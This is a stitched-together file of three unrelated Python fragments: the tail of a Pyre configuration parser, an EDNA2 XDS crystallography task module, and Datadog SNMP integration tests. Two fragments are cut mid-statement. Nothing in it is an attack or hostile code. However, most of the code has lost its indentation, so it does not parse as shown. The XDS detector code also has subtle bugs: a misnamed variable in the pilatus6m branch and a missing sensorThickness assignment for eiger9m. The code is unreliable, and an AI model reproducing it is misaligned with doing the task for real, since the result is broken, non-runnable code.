unwatched_dependency=None,
use_buck2=arguments.use_buck2,
version_hash=None,
)
@staticmethod
def from_string(contents: str) -> "PartialConfiguration":
def is_list_of_string(elements: object) -> bool:
return isinstance(elements, list) and all(
isinstance(element, str) for element in elements
)
def ensure_option_type(
json: Dict[str, Any], name: str, expected_type: Type[T]
) -> Optional[T]:
result = json.pop(name, None)
if result is None:
return None
elif isinstance(result, expected_type):
return result
raise exceptions.InvalidConfiguration(
f"Configuration field `{name}` is expected to have type "
f"{expected_type} but got: `{result}`."
)
def ensure_optional_string_or_string_dict(
json: Dict[str, Any], name: str
) -> Optional[Union[Dict[str, str], str]]:
result = json.pop(name, None)
if result is None:
return None
elif isinstance(result, str):
return result
elif isinstance(result, Dict):
for value in result.values():
if not isinstance(value, str):
raise exceptions.InvalidConfiguration(
f"Configuration field `{name}` is expected to be a "
+ f"dict of strings but got `{result}`."
)
return result
raise exceptions.InvalidConfiguration(
f"Configuration field `{name}` is expected to be a string or a "
+ f"dict of strings but got `{result}`."
)
def ensure_optional_string_list(
json: Dict[str, Any], name: str
) -> Optional[List[str]]:
result = json.pop(name, None)
if result is None:
return None
elif is_list_of_string(result):
return result
raise exceptions.InvalidConfiguration(
f"Configuration field `{name}` is expected to be a list of "
+ f"strings but got `{result}`."
)
def ensure_string_list(
json: Dict[str, Any], name: str, allow_single_string: bool = False
) -> List[str]:
result = json.pop(name, [])
if allow_single_string and isinstance(result, str):
result = [result]
if is_list_of_string(result):
return result
raise exceptions.InvalidConfiguration(
f"Configuration field `{name}` is expected to be a list of "
+ f"strings but got `{result}`."
)
def ensure_list(json: Dict[str, object], name: str) -> List[object]:
result = json.pop(name, [])
if isinstance(result, list):
return result
raise exceptions.InvalidConfiguration(
f"Configuration field `{name}` is expected to be a list but got `{result}`."
)
try:
configuration_json = json.loads(contents)
dot_pyre_directory = ensure_option_type(
configuration_json, "dot_pyre_directory", str
)
search_path_json = configuration_json.pop("search_path", [])
if isinstance(search_path_json, list):
search_path = [
search_path_module.create_raw_element(json)
for json in search_path_json
]
else:
search_path = [search_path_module.create_raw_element(search_path_json)]
python_version_json = configuration_json.pop("python_version", None)
if python_version_json is None:
python_version = None
elif isinstance(python_version_json, str):
python_version = python_version_module.PythonVersion.from_string(
python_version_json
)
else:
raise exceptions.InvalidConfiguration(
"Expect python version to be a string but got"
+ f"'{python_version_json}'"
)
shared_memory_json = ensure_option_type(
configuration_json, "shared_memory", dict
)
if shared_memory_json is None:
shared_memory = shared_memory_module.SharedMemory()
else:
shared_memory = shared_memory_module.SharedMemory(
heap_size=ensure_option_type(shared_memory_json, "heap_size", int),
dependency_table_power=ensure_option_type(
shared_memory_json, "dependency_table_power", int
),
hash_table_power=ensure_option_type(
shared_memory_json, "hash_table_power", int
),
)
for unrecognized_key in shared_memory_json:
LOG.warning(f"Unrecognized configuration item: {unrecognized_key}")
source_directories_json = ensure_option_type(
configuration_json, "source_directories", list
)
if isinstance(source_directories_json, list):
source_directories = [
search_path_module.create_raw_element(json)
for json in source_directories_json
]
else:
source_directories = None
site_package_search_strategy_json = ensure_option_type(
configuration_json, "site_package_search_strategy", str
)
if site_package_search_strategy_json is None:
site_package_search_strategy = None
else:
site_package_search_strategy = site_packages.SearchStrategy.from_string(
site_package_search_strategy_json
)
if site_package_search_strategy is None:
raise exceptions.InvalidConfiguration(
"Invalid value for `site_package_search_strategy`: "
f"{site_package_search_strategy_json}. Available choices: "
f"{[str(x) for x in site_packages.SearchStrategy]}."
)
ide_features_json = ensure_option_type(
configuration_json, "ide_features", dict
)
if ide_features_json is None:
ide_features = None
else:
ide_features = ide_features_module.IdeFeatures.create_from_json(
ide_features_json
)
unwatched_dependency_json = ensure_option_type(
configuration_json, "unwatched_dependency", dict
)
if unwatched_dependency_json is None:
unwatched_dependency = None
else:
unwatched_dependency = unwatched.UnwatchedDependency.from_json(
unwatched_dependency_json
)
partial_configuration = PartialConfiguration(
binary=ensure_option_type(configuration_json, "binary", str),
buck_mode=platform_aware.PlatformAware.from_json(
ensure_optional_string_or_string_dict(
configuration_json, "buck_mode"
),
"buck_mode",
),
do_not_ignore_errors_in=ensure_string_list(
configuration_json, "do_not_ignore_errors_in"
),
dot_pyre_directory=Path(dot_pyre_directory)
if dot_pyre_directory is not None
else None,
excludes=ensure_string_list(
configuration_json, "exclude", allow_single_string=True
),
extensions=[
# pyre-fixme[6]: we did not fully verify the type of `json`
ExtensionElement.from_json(json)
for json in ensure_list(configuration_json, "extensions")
],
ide_features=ide_features,
ignore_all_errors=ensure_string_list(
configuration_json, "ignore_all_errors"
),
isolation_prefix=ensure_option_type(
configuration_json, "isolation_prefix", str
),
logger=ensure_option_type(configuration_json, "logger", str),
number_of_workers=ensure_option_type(
configuration_json, "workers", int
),
oncall=ensure_option_type(configuration_json, "oncall", str),
other_critical_files=ensure_string_list(
configuration_json, "critical_files"
),
pysa_version_hash=ensure_option_type(
configuration_json, "pysa_version", str
),
python_version=python_version,
search_path=search_path,
shared_memory=shared_memory,
site_package_search_strategy=site_package_search_strategy,
site_roots=ensure_optional_string_list(
configuration_json, "site_roots"
),
source_directories=source_directories,
strict=ensure_option_type(configuration_json, "strict", bool),
taint_models_path=ensure_string_list(
configuration_json, "taint_models_path", allow_single_string=True
),
targets=ensure_optional_string_list(configuration_json, "targets"),
typeshed=ensure_option_type(configuration_json, "typeshed", str),
unwatched_dependency=unwatched_dependency,
use_buck2=ensure_option_type(configuration_json, "use_buck2", bool),
version_hash=ensure_option_type(configuration_json, "version", str),
)
# Check for deprecated and unused keys
for (
deprecated_key,
replacement_key,
) in PartialConfiguration._get_depreacted_map().items():
if deprecated_key in configuration_json:
configuration_json.pop(deprecated_key)
LOG.warning(
f"Configuration file uses deprecated item `{deprecated_key}`. "
f"Please migrate to its replacement `{replacement_key}`"
)
extra_keys = PartialConfiguration._get_extra_keys()
for unrecognized_key in configuration_json:
if unrecognized_key | |
#
# Copyright (c) European Synchrotron Radiation Facility (ESRF)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__authors__ = ["<NAME>"]
__license__ = "MIT"
__date__ = "20/04/2020"
# Corresponding EDNA code:
# https://github.com/olofsvensson/edna-mx
# mxPluginExec/plugins/EDPluginGroupXDS-v1.0/plugins/EDPluginXDSv1_0.py
# mxPluginExec/plugins/EDPluginGroupXDS-v1.0/plugins/EDPluginXDSIndexingv1_0.py
import os
import math
import shutil
import numpy as np
from edna2.tasks.AbstractTask import AbstractTask
from edna2.utils import UtilsImage
from edna2.utils import UtilsConfig
from edna2.utils import UtilsLogging
from edna2.utils import UtilsDetector
from edna2.utils import UtilsSymmetry
logger = UtilsLogging.getLogger()
class XDSTask(AbstractTask):
"""
Common base class for all XDS tasks
"""
    def run(self, inData):
        """Execute an XDS run for this task.

        Generates XDS.INP content from ``inData``, writes it into the working
        directory, runs ``xds_par`` there (logging to xds.log), and parses the
        working directory for results.

        :param inData: task input dict (contains the "subWedge" description
            consumed by generateXDS_INP — see subclasses)
        :return: parsed output data from parseXDSOutput
        """
        commandLine = 'xds_par'
        listXDS_INP = self.generateXDS_INP(inData)
        self.writeXDS_INP(listXDS_INP, self.getWorkingDirectory())
        self.setLogFileName('xds.log')
        self.runCommandLine(commandLine, listCommand=[])
        # Work in progress!
        outData = self.parseXDSOutput(self.getWorkingDirectory())
        return outData
@staticmethod
def generateImageLinks(inData, workingDirectory=None):
listImageLink = []
firstSubWedge = inData["subWedge"][0]
firstImagePath = firstSubWedge["image"][0]["path"]
prefix = UtilsImage.getPrefix(firstImagePath)
suffix = UtilsImage.getSuffix(firstImagePath)
template = "%s_xdslink_?????.%s" % (prefix, suffix)
xdsLowestImageNumberGlobal = 1
# First we have to find the smallest goniostat rotation axis start:
oscillationStartMin = 0
# for subWedge in inData["subWedge"]:
# goniostat = subWedge["experimentalCondition"]["goniostat"]
# oscillationStart = goniostat["rotationAxisStart"]
# if oscillationStartMin is None or \
# oscillationStartMin > oscillationStart:
# oscillationStartMin = oscillationStart
# Loop through the list of sub wedges
for subWedge in inData["subWedge"]:
imageList = subWedge["image"]
xsDataGoniostat = subWedge["experimentalCondition"]["goniostat"]
oscillationStart = xsDataGoniostat["rotationAxisStart"]
oscillationRange = xsDataGoniostat["oscillationWidth"]
# First find the lowest and highest image numbers
lowestImageNumber = None
for dictImage in imageList:
imageNumber = dictImage["number"]
if lowestImageNumber is None or imageNumber < lowestImageNumber:
lowestImageNumber = imageNumber
# Loop through the list of images
lowestXDSImageNumber = None
highestXDSImageNumber = None
for dictImage in imageList:
imageNumber = dictImage["number"]
imageOscillationStart = \
oscillationStart + (imageNumber - lowestImageNumber) * oscillationRange
# if xdsLowestImageNumberGlobal is None:
# xdsLowestImageNumberGlobal = 1 + int((imageOscillationStart - oscillationStartMin) / oscillationRange)
xdsImageNumber = xdsLowestImageNumberGlobal + \
int((imageOscillationStart - oscillationStartMin) / oscillationRange)
print(xdsImageNumber, imageOscillationStart, oscillationStartMin, oscillationRange)
sourcePath = dictImage["path"]
target = "%s_xdslink_%05d.%s" % (prefix, xdsImageNumber, suffix)
print([sourcePath, target])
listImageLink.append([sourcePath, target])
if workingDirectory is not None:
os.symlink(sourcePath, target)
if lowestXDSImageNumber is None or \
lowestXDSImageNumber > xdsImageNumber:
lowestXDSImageNumber = xdsImageNumber
if highestXDSImageNumber is None or \
highestXDSImageNumber < xdsImageNumber:
highestXDSImageNumber = xdsImageNumber
dictImageLinks = {
"imageLink": listImageLink,
"dataRange": [lowestXDSImageNumber, highestXDSImageNumber],
"template": template
}
return dictImageLinks
@staticmethod
def generateXDS_INP(inData):
"""
This method creates a list of XDS.INP commands
"""
# Take the first sub webge in input as reference
firstSubwedge = inData["subWedge"][0]
listImage = firstSubwedge['image']
image = listImage[0]
experimentalCondition = firstSubwedge['experimentalCondition']
detector = experimentalCondition['detector']
dictXDSDetector = XDSTask.getXDSDetector(detector)
beam = experimentalCondition['beam']
goniostat = experimentalCondition['goniostat']
distance = round(detector['distance'], 3)
wavelength = round(beam['wavelength'], 3)
oscRange = goniostat['oscillationWidth']
startAngle = goniostat['rotationAxisStart'] - int(goniostat['rotationAxisStart'])
dataRange = '1 360'
listXDS_INP = [
'OVERLOAD=10048500',
'DIRECTION_OF_DETECTOR_X-AXIS={0}'.format(UtilsConfig.get('XDSTask', 'DIRECTION_OF_DETECTOR_X-AXIS')),
'DIRECTION_OF_DETECTOR_Y-AXIS={0}'.format(UtilsConfig.get('XDSTask', 'DIRECTION_OF_DETECTOR_Y-AXIS')),
'ROTATION_AXIS={0}'.format(UtilsConfig.get('XDSTask', 'ROTATION_AXIS')),
'INCIDENT_BEAM_DIRECTION={0}'.format(UtilsConfig.get('XDSTask', 'INCIDENT_BEAM_DIRECTION')),
'NX={0} NY={1} QX={2} QY={2}'.format(
dictXDSDetector["nx"], dictXDSDetector["ny"], dictXDSDetector["pixel"]),
'ORGX={0} ORGY={1}'.format(
dictXDSDetector["orgX"], dictXDSDetector["orgY"]),
'DETECTOR={0} MINIMUM_VALID_PIXEL_VALUE={1} OVERLOAD={2}'.format(
dictXDSDetector["name"],
dictXDSDetector["minimumValidPixelValue"],
dictXDSDetector["overload"]
),
'SENSOR_THICKNESS={0}'.format(
dictXDSDetector["sensorThickness"]),
'TRUSTED_REGION={0} {1}'.format(
dictXDSDetector["trustedRegion"][0],
dictXDSDetector["trustedRegion"][1]
)]
# for trustedRegion in dictXDSDetector["untrustedRectangle"]:
# listXDS_INP.append('UNTRUSTED_RECTANGLE={0} {1} {2} {3}'.format(
# trustedRegion[0], trustedRegion[1],
# trustedRegion[2],trustedRegion[3]
# ))
listXDS_INP += [
'DETECTOR_DISTANCE={0}'.format(distance),
'X-RAY_WAVELENGTH={0}'.format(wavelength),
'OSCILLATION_RANGE={0}'.format(oscRange),
'STARTING_ANGLE={0}'.format(startAngle),
'INDEX_QUALITY= 0.25'
]
if "spaceGroupNumber" in inData:
spaceGroupNumber = inData["spaceGroupNumber"]
cell = inData["cell"]
unitCellConstants = "{a} {b} {c} {alpha} {beta} {gamma}".format(**cell)
listXDS_INP += [
'SPACE_GROUP_NUMBER={0}'.format(spaceGroupNumber),
'UNIT_CELL_CONSTANTS={0}'.format(unitCellConstants)
]
return listXDS_INP
@staticmethod
def createSPOT_XDS(listDozorSpotFile, oscRange):
"""
implicit none
integer nmax
parameter(nmax=10000000)
real*4 x(3),j
integer n,i,k
real*4 xa(nmax,3),ja(nmax)
logical new
c
n=0
do while(.true.)
read(*,*,err=1,end=1)x,j
new = .true.
do i = n,1,-1
if (abs(xa(i,3)-x(3)) .gt. 20.0 ) goto 3
do k = 1,2
if (abs(x(k)-xa(i,k)) .gt. 6.0) goto 2
enddo
new = .false.
xa(i,:)=(xa(i,:)*ja(i)+x*j)/(ja(i)+j)
ja(i)=ja(i)+j
2 continue
enddo
3 if (new) then
n=n+1
xa(n,:)=x
ja(n)=j
endif
enddo
1 continue
do i=1,n
write(*,*)xa(i,:), ja(i)
enddo
end
"""
listSpotXds = []
n = 0
firstFrame = True
for dozorSpotFile in listDozorSpotFile:
# Read the file
with open(str(dozorSpotFile)) as f:
dozorLines = f.readlines()
omega = float(dozorLines[2].split()[1])
frame = int((omega - oscRange/2)/oscRange) + 1
frame = frame % 360
for dozorLine in dozorLines[3:]:
new = True
listValues = dozorLine.split()
n, xPos, yPos, intensity, sigma = list(map(float, listValues))
# Subtracting 1 from X and Y: this is because for dozor the upper left pixel in the image is (1,1),
# whereas for the rest of the world it is (0,0)
xPos = xPos - 1
yPos = yPos - 1
index = 0
for spotXds in listSpotXds:
frameOld = spotXds[2]
if abs(frameOld - frame) > 20:
break
xPosOld = spotXds[0]
yPosOld = spotXds[1]
intensityOld = spotXds[3]
if abs(xPosOld - xPos) <= 6 and abs(yPosOld - yPos) <= 6:
new = False
intensityNew = intensity + intensityOld
xPosNew = (xPosOld*intensityOld + xPos*intensity) / intensityNew
yPosNew = (yPosOld*intensityOld + yPos*intensity) / intensityNew
listSpotXds[index] = [xPosNew, yPosNew, frameOld, intensityNew]
index += 1
if new:
spotXds = [xPos, yPos, frame, intensity]
listSpotXds.append(spotXds)
strSpotXds = ''
for spotXds in listSpotXds:
strSpotXds += '{0:13.6f}{1:17.6f}{2:17.8f}{3:17.6f} \n'.format(*spotXds)
return strSpotXds
@staticmethod
def writeSPOT_XDS(listDozorSpotFile, oscRange, workingDirectory):
spotXds = XDSTask.createSPOT_XDS(listDozorSpotFile, oscRange)
filePath = workingDirectory / 'SPOT.XDS'
with open(str(filePath), 'w') as f:
f.write(spotXds)
def writeXDS_INP(self, listXDS_INP, workingDirectory):
fileName = 'XDS.INP'
filePath = workingDirectory / fileName
with open(str(filePath), 'w') as f:
for line in listXDS_INP:
f.write(line + '\n')
@staticmethod
def getXDSDetector(dictDetector):
dictXDSDetector = None
detectorType = dictDetector["type"]
nx = UtilsDetector.getNx(detectorType)
ny = UtilsDetector.getNy(detectorType)
pixel = UtilsDetector.getPixelsize(detectorType)
orgX = round(dictDetector['beamPositionX'] / pixel, 3)
orgY = round(dictDetector['beamPositionY'] / pixel, 3)
if detectorType == "pilatus2m":
untrustedRectangle = \
[[487, 495, 0, 1680],
[981, 989, 0, 1680],
[0, 1476, 195, 213],
[0, 1476, 407, 425],
[0, 1476, 619, 637],
[0, 1476, 831, 849],
[0, 1476, 1043, 1061],
[0, 1476, 1255, 1273],
[0, 1476, 1467, 1485]]
sensorThickness = 0.32
elif detectorType == "pilatus6m":
listUntrustedRectangle = \
[[ 487, 495, 0, 2528],
[ 981, 989, 0, 2528],
[1475, 1483, 0, 2528],
[1969, 1977, 0, 2528],
[ 0, 2464, 195, 213],
[ 0, 2464, 407, 425],
[ 0, 2464, 619, 637],
[ 0, 2464, 831, 849],
[ 0, 2464, 1043, 1061],
[ 0, 2464, 1255, 1273],
[ 0, 2464, 1467, 1485],
[ 0, 2464, 1679, 1697],
[ 0, 2464, 1891, 1909],
[ 0, 2464, 2103, 2121],
[ 0, 2464, 2315, 2333]]
sensorThickness = 0.32
elif detectorType == "eiger4m":
untrustedRectangle = \
[[1029, 1040, 0, 2167],
[0, 2070, 512, 550],
[0, 2070, 1063, 1103],
[0, 2070, 1614, 1654],
]
sensorThickness = 0.32
elif detectorType == "eiger9m":
untrustedRectangle = \
[[1029, 1040, 0, 3269],
[2069, 2082, 0, 3269],
[0, 3110, 513, 553],
[0, 3110, 1064, 1104],
[0, 3110, 1615, 1655],
[0, 3110, 2166, 2206],
[0, 3110, 2717, 2757],
]
else:
raise RuntimeError("Unknown detector: {0}".format(detectorType))
dictXDSDetector = {
"name": "PILATUS",
"nx": nx,
"ny": ny,
"orgX": orgX,
"orgY": orgY,
"pixel": pixel,
# "untrustedRectangle": untrustedRectangle,
"trustedRegion": [0.0, 1.41],
"trustedpixel": [7000, 30000],
"minimumValidPixelValue": 0,
"overload": 1048500,
"sensorThickness": sensorThickness
}
return dictXDSDetector
class XDSIndexing(XDSTask):
def generateXDS_INP(self, inData):
firstSubWedge = inData["subWedge"][0]
listDozorSpotFile = inData['dozorSpotFile']
experimentalCondition = firstSubWedge['experimentalCondition']
goniostat = experimentalCondition['goniostat']
oscRange = goniostat['oscillationWidth']
XDSTask.writeSPOT_XDS(listDozorSpotFile, oscRange=oscRange, workingDirectory=self.getWorkingDirectory())
listXDS_INP = XDSTask.generateXDS_INP(inData)
listXDS_INP.insert(0, 'JOB= IDXREF')
listXDS_INP.append("DATA_RANGE= 1 360")
return listXDS_INP
@staticmethod
def parseXDSOutput(workingDirectory):
idxrefPath = workingDirectory / 'IDXREF.LP'
xparmPath = workingDirectory / 'XPARM.XDS'
outData = {
"idxref": XDSIndexing.readIdxrefLp(idxrefPath),
"xparm": XDSIndexing.parseXparm(xparmPath),
"xparmXdsPath": xparmPath
}
return outData
@staticmethod
def readIdxrefLp(pathToIdxrefLp, resultXDSIndexing=None):
if resultXDSIndexing is None:
resultXDSIndexing = {}
if pathToIdxrefLp.exists():
with | |
<filename>snmp/tests/test_check.py
# (C) Datadog, Inc. 2018-present
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
import ipaddress
import logging
import os
import socket
import time
import mock
import pytest
import yaml
from datadog_checks.base import ConfigurationError, to_native_string
from datadog_checks.dev import temp_dir
from datadog_checks.snmp import SnmpCheck
from . import common
pytestmark = [pytest.mark.usefixtures("dd_environment"), common.python_autodiscovery_only]
def test_command_generator():
    """
    Command generator's parameters should match init_config
    """
    instance = common.generate_instance_config(common.CONSTRAINED_OID)
    default_check = SnmpCheck('snmp', common.MIBS_FOLDER, [instance])
    config = default_check._config
    # Collect the MIB source paths configured on the SNMP engine.
    mib_sources = config._snmp_engine.getMibBuilder().getMibSources()
    full_path_mib_folders = [source.fullPath() for source in mib_sources]
    assert default_check.ignore_nonincreasing_oid is False  # Default value
    tweaked_check = SnmpCheck('snmp', common.IGNORE_NONINCREASING_OID, [instance])
    assert tweaked_check.ignore_nonincreasing_oid
    # The custom MIB folder must be among the engine's MIB sources.
    assert common.MIBS_FOLDER["mibs_folder"] in full_path_mib_folders
def test_type_support(aggregator):
    """
    Support expected types
    """
    all_metrics = common.SUPPORTED_METRIC_TYPES + common.UNSUPPORTED_METRICS
    instance = common.generate_instance_config(all_metrics)
    check = common.create_check(instance)
    check.check(instance)
    # Supported types report exactly one point; unsupported ones report none.
    expectations = [(metric, 1) for metric in common.SUPPORTED_METRIC_TYPES]
    expectations += [(metric, 0) for metric in common.UNSUPPORTED_METRICS]
    for metric, expected_count in expectations:
        aggregator.assert_metric("snmp." + metric['name'], tags=common.CHECK_TAGS, count=expected_count)
    aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
    # Test service check
    aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
    common.assert_common_metrics(aggregator)
    aggregator.all_metrics_asserted()
def test_transient_error(aggregator):
    """A one-off command error yields CRITICAL; the next run recovers to OK."""
    instance = common.generate_instance_config(common.SUPPORTED_METRIC_TYPES)
    check = common.create_check(instance)
    error_patch = mock.patch('datadog_checks.snmp.commands._handle_error', side_effect=RuntimeError)
    with error_patch:
        check.check(instance)
    aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.CRITICAL, tags=common.CHECK_TAGS, at_least=1)
    check.check(instance)
    aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
def test_snmpget(aggregator):
    """
    When failing with 'snmpget' command, SNMP check falls back to 'snmpgetnext'

        > snmpget -v2c -c public localhost:11111 1.3.6.1.2.1.25.6.3.1.4
        iso.3.6.1.2.1.25.6.3.1.4 = No Such Instance currently exists at this OID
        > snmpgetnext -v2c -c public localhost:11111 1.3.6.1.2.1.25.6.3.1.4
        iso.3.6.1.2.1.25.6.3.1.4.0 = INTEGER: 4
    """
    instance = common.generate_instance_config(common.PLAY_WITH_GET_NEXT_METRICS)
    check = common.create_check(instance)
    check.check(instance)
    # Every metric must still be reported via the getnext fallback.
    for entry in common.PLAY_WITH_GET_NEXT_METRICS:
        aggregator.assert_metric("snmp." + entry['name'], tags=common.CHECK_TAGS, at_least=1)
    aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
    aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
    common.assert_common_metrics(aggregator)
    aggregator.all_metrics_asserted()
def test_custom_mib(aggregator):
    """Metrics from a custom MIB folder resolve with the expected type and value."""
    oids = [oid for oid, _, _ in common.DUMMY_MIB_OID]
    instance = common.generate_instance_config(oids)
    instance["community_string"] = "dummy"
    check = SnmpCheck('snmp', common.MIBS_FOLDER, [instance])
    check.check(instance)
    for metric, metric_type, value in common.DUMMY_MIB_OID:
        name = "snmp." + (metric.get('name') or metric.get('symbol'))
        aggregator.assert_metric(name, metric_type=metric_type, count=1, value=value, tags=common.CHECK_TAGS)
    aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
def test_scalar(aggregator):
    """
    Support SNMP scalar objects
    """
    instance = common.generate_instance_config(common.SCALAR_OBJECTS)
    check = common.create_check(instance)
    check.check(instance)
    # Each scalar object must produce exactly one tagged point.
    for obj in common.SCALAR_OBJECTS:
        name = "snmp." + (obj.get('name') or obj.get('symbol'))
        aggregator.assert_metric(name, tags=common.CHECK_TAGS, count=1)
    aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
    aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
    common.assert_common_metrics(aggregator)
    aggregator.all_metrics_asserted()
def test_enforce_constraint(aggregator):
    """With MIB constraints enforced, a constraint violation fails the check."""
    instance = common.generate_instance_config(common.CONSTRAINED_OID)
    instance["community_string"] = "constraint"
    instance["enforce_mib_constraints"] = True
    check = common.create_check(instance)
    check.check(instance)
    aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.CRITICAL, tags=common.CHECK_TAGS, at_least=1)
    failure_message = aggregator.service_checks("snmp.can_check")[0].message
    assert "failed at: ValueConstraintError" in failure_message
def test_unenforce_constraint(aggregator):
    """
    Allow ignoring constraints
    """
    instance = common.generate_instance_config(common.CONSTRAINED_OID)
    instance["community_string"] = "constraint"
    instance["enforce_mib_constraints"] = False
    check = common.create_check(instance)
    check.check(instance)
    # With constraints disabled, the constrained OIDs report normally.
    for obj in common.CONSTRAINED_OID:
        name = "snmp." + (obj.get('name') or obj.get('symbol'))
        aggregator.assert_metric(name, tags=common.CHECK_TAGS, count=1)
    aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
    common.assert_common_metrics(aggregator)
    aggregator.all_metrics_asserted()
def test_table(aggregator):
    """
    Support SNMP tabular objects
    """
    instance = common.generate_instance_config(common.TABULAR_OBJECTS)
    check = common.create_check(instance)
    check.check(instance)
    table = common.TABULAR_OBJECTS[0]
    # Every table symbol must be reported, carry the device tag, and have a
    # tag derived from each configured column.
    for symbol in table['symbols']:
        metric_name = "snmp." + symbol
        aggregator.assert_metric(metric_name, at_least=1)
        aggregator.assert_metric_has_tag(metric_name, common.CHECK_TAGS[0], at_least=1)
        for column in table['metric_tags']:
            aggregator.assert_metric_has_tag_prefix(metric_name, column['tag'], at_least=1)
    aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
    aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
    common.assert_common_metrics(aggregator)
    aggregator.all_metrics_asserted()
def test_table_regex_match(aggregator):
    """Column regex matches generate one tag per capture group."""
    metrics = [
        {
            'MIB': "IF-MIB",
            'table': "ifTable",
            'symbols': ["ifInOctets", "ifOutOctets"],
            'metric_tags': [
                {'tag': "interface", 'column': "ifDescr"},
                {'column': "ifDescr", 'match': '(\\w)(\\w+)', 'tags': {'prefix': '\\1', 'suffix': '\\2'}},
            ],
        }
    ]
    common_tags = ['snmp_device:localhost']
    instance = common.generate_instance_config(metrics)
    check = common.create_check(instance)
    check.check(instance)
    for symbol in common.TABULAR_OBJECTS[0]['symbols']:
        metric_name = "snmp." + symbol
        for interface in ('tunl0', 'eth0', 'ip6tnl0'):
            # prefix/suffix come from splitting the interface name via the regex.
            expected_tags = common_tags + [
                'interface:{}'.format(interface),
                'prefix:{}'.format(interface[:1]),
                'suffix:{}'.format(interface[1:]),
            ]
            aggregator.assert_metric(metric_name, tags=expected_tags)
    aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
    common.assert_common_metrics(aggregator)
    aggregator.assert_all_metrics_covered()
def test_resolved_table(aggregator):
    """Tables given as pre-resolved OIDs behave like MIB-based tables."""
    instance = common.generate_instance_config(common.RESOLVED_TABULAR_OBJECTS)
    check = common.create_check(instance)
    check.check(instance)
    table = common.TABULAR_OBJECTS[0]
    for symbol in table['symbols']:
        metric_name = "snmp." + symbol
        aggregator.assert_metric(metric_name, at_least=1)
        aggregator.assert_metric_has_tag(metric_name, common.CHECK_TAGS[0], at_least=1)
        for column in table['metric_tags']:
            aggregator.assert_metric_has_tag_prefix(metric_name, column['tag'], at_least=1)
    aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
    aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
    common.assert_common_metrics(aggregator)
    aggregator.all_metrics_asserted()
def test_table_v3_MD5_DES(aggregator):
    """
    Support SNMP V3 priv modes: MD5 + DES
    """
    auth = 'MD5'
    priv = 'DES'
    instance = common.generate_v3_instance_config(
        common.TABULAR_OBJECTS,
        name='instance_{}_{}'.format(auth, priv),
        user='datadog{}{}'.format(auth.upper(), priv.upper()),
        auth=common.AUTH_PROTOCOLS[auth],
        auth_key=common.AUTH_KEY,
        priv=common.PRIV_PROTOCOLS[priv],
        priv_key=common.PRIV_KEY,
    )
    check = common.create_check(instance)
    check.check(instance)
    table = common.TABULAR_OBJECTS[0]
    for symbol in table['symbols']:
        metric_name = "snmp." + symbol
        aggregator.assert_metric(metric_name, at_least=1)
        aggregator.assert_metric_has_tag(metric_name, common.CHECK_TAGS[0], at_least=1)
        for column in table['metric_tags']:
            aggregator.assert_metric_has_tag_prefix(metric_name, column['tag'], at_least=1)
    aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
    aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
    common.assert_common_metrics(aggregator)
    aggregator.all_metrics_asserted()
def test_table_v3_MD5_AES(aggregator):
    """
    Support SNMP V3 priv modes: MD5 + AES
    """
    auth = 'MD5'
    priv = 'AES'
    # NOTE(review): unlike test_table_v3_MD5_DES, this passes the shorthand
    # protocol names directly instead of common.AUTH_PROTOCOLS /
    # common.PRIV_PROTOCOLS -- presumably exercising both accepted spellings;
    # confirm this is intentional.
    instance = common.generate_v3_instance_config(
        common.TABULAR_OBJECTS,
        name='instance_{}_{}'.format(auth, priv),
        user='datadog{}{}'.format(auth.upper(), priv.upper()),
        auth=auth,
        auth_key=common.AUTH_KEY,
        priv=priv,
        priv_key=common.PRIV_KEY,
    )
    check = common.create_check(instance)
    check.check(instance)
    table = common.TABULAR_OBJECTS[0]
    for symbol in table['symbols']:
        metric_name = "snmp." + symbol
        aggregator.assert_metric(metric_name, at_least=1)
        aggregator.assert_metric_has_tag(metric_name, common.CHECK_TAGS[0], at_least=1)
        for column in table['metric_tags']:
            aggregator.assert_metric_has_tag_prefix(metric_name, column['tag'], at_least=1)
    aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
    aggregator.assert_service_check("snmp.can_check", status=SnmpCheck.OK, tags=common.CHECK_TAGS, at_least=1)
    common.assert_common_metrics(aggregator)
    aggregator.all_metrics_asserted()
